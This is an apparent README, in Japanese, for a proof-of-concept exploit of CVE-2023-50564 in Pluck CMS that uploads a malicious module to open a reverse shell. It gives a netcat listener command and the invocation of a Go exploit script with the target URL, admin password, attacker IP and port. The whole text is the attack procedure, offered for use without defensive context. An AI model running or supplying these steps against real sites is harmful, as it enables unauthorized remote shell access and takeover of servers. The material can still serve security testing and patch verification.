
Pluck CMS を標的とした CVE-2023-50564 の概念実証エクスプロイト。悪意のあるモジュールインストールを介してリバースシェルを配信します。
まず、リバースシェル用のリスナーを設定します。
端末1
nc -nlvp <lport>
リバースシェルを返送するpluckモジュールのインストールを試みるスクリプトを実行します。
端末2
go run exploit.go -url <url> -password <passwd> -i <your-ip> -p <lport>